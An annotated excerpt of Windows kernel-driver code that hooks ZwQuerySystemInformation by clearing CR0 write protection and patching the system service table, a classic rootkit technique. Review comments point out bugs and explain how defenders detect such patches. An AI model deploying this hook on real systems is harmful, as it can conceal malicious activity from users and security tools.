/////////////// Native API declarations ///////////////////////////////////
// Prototype of the ntoskrnl export whose service-table entry is replaced
// further down.  The kernel declares it with NTAPI (__stdcall on x86).
NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength);
// Function-pointer type used to hold the original service-table entry
// (OldZwQuerySystemInformation below).
// NOTE(review): no NTAPI on this pointer type, so it gets the compiler's default
// calling convention while the routine it points to is NTAPI.  On x86 a
// convention mismatch leaves the stack unbalanced after the call -- confirm
// against the project's compiler settings before relying on it.
typedef NTSTATUS (*ZWQUERYSYSTEMINFORMATION)(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength);
// Replacement routine whose address is written into the service table below.
// Its body is not part of this excerpt.
// NOTE(review): declared without NTAPI; same calling-convention caveat as the typedef.
NTSTATUS MyZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength);
///////////////// Layout of ntoskrnl.exe's service descriptor table entry ////////////////////////
// Mirrors the kernel's exported KeServiceDescriptorTable entry.  The asm further
// down reads only the first field: it indexes ServiceTableBase by service number
// (4-byte slots) to fetch and overwrite a routine address.  The remaining fields
// are not used in this excerpt; their semantics are not established here.
typedef struct _ServiceDescriptorEntry {
unsigned int *ServiceTableBase;          // array of service routine addresses, indexed by service number
unsigned int *ServiceCounterTableBase;   // unused here
unsigned int NumberOfServices;           // unused here
unsigned char *ParamTableBase;           // unused here
}ServiceDescriptorTableEntry, *PServiceDescriptorTableEntry;
//////////////////// Globals used by the hook code ///////////////
// The kernel's exported service descriptor table.
// NOTE(review): the asm below loads [KeServiceDescriptorTable] and then dereferences
// the result once more to reach ServiceTableBase, which only works if this symbol
// resolves to the table's address through an import slot (as a __declspec(dllimport)
// data symbol would).  With the plain extern written here, confirm how the build
// resolves it; a direct data reference would make the asm read one level too deep.
extern PServiceDescriptorTableEntry KeServiceDescriptorTable;
ZWQUERYSYSTEMINFORMATION OldZwQuerySystemInformation;   // original service-table entry, saved by the hook code
unsigned long OldCr0;                                   // CR0 value captured before write protection is cleared
UNICODE_STRING DeviceNameString;                        // not referenced in this excerpt
UNICODE_STRING LinkDeviceNameString;                    // not referenced in this excerpt
////////////////////// Hook ZwQuerySystemInformation /////////////////////////////////////////////////
// NOTE(review): the enclosing function begins before this excerpt.  The three
// MSVC inline-asm statements below (x86) patch the service-table entry of
// ZwQuerySystemInformation in place:
//   1. clear CR0.WP so the read-only service table can be written,
//   2. save the original entry and overwrite it with MyZwQuerySystemInformation,
//   3. restore CR0.
// From a defender's view: a service-table slot pointing outside the ntoskrnl
// image is a classic kernel integrity-check finding, and on 64-bit kernels this
// class of patch is what Kernel Patch Protection reports.  No unhook path is
// visible in this excerpt.
_asm{
cli;                            // masks interrupts on the current CPU only; other processors
                                // keep running, so this gives no multiprocessor safety
mov eax,cr0
mov OldCr0,eax                  // keep the original CR0 so it can be restored afterwards
and eax,0fffeffffh //clear bit 16 of CR0 (WP, write protect).  WP=1 stops supervisor-level code
//from writing to read-only pages; WP=0 allows it.  The flag exists to support copy-on-write
//when forking a new process, as in UNIX operating systems.
mov cr0,eax
}
// The table write below is a plain store, not an interlocked/atomic update.
_asm{
mov ecx, dword ptr [ZwQuerySystemInformation];      // ecx = address of the Zw stub (presumably via its import slot)
mov edx, [ecx+1];                                   // edx = service number read from the stub: the dword after its
                                                    // first opcode byte -- presumably mov eax,imm32; if the stub
                                                    // encoding differs, this silently indexes the wrong slot
mov eax, dword ptr [KeServiceDescriptorTable];      // eax = descriptor table (assumes the symbol resolves to its address)
mov esi, [eax];                                     // esi = ServiceTableBase
mov edx, [esi+edx*4];                               // edx = ServiceTableBase[service number], the original routine
mov dword ptr [OldZwQuerySystemInformation], edx    // save it for later forwarding/restoration
mov ecx, [ecx+1]                                    // ecx = service number again (edx was reused above)
mov eax, [eax]                                      // eax = ServiceTableBase
mov dword ptr [eax+ecx*4], offset MyZwQuerySystemInformation;   // install the replacement routine
}
_asm
{
mov eax,OldCr0                  // restore the CR0 captured before the patch
mov cr0,eax
sti;                            // enables interrupts unconditionally -- even if they were
                                // already disabled when cli ran above; not a true restore
}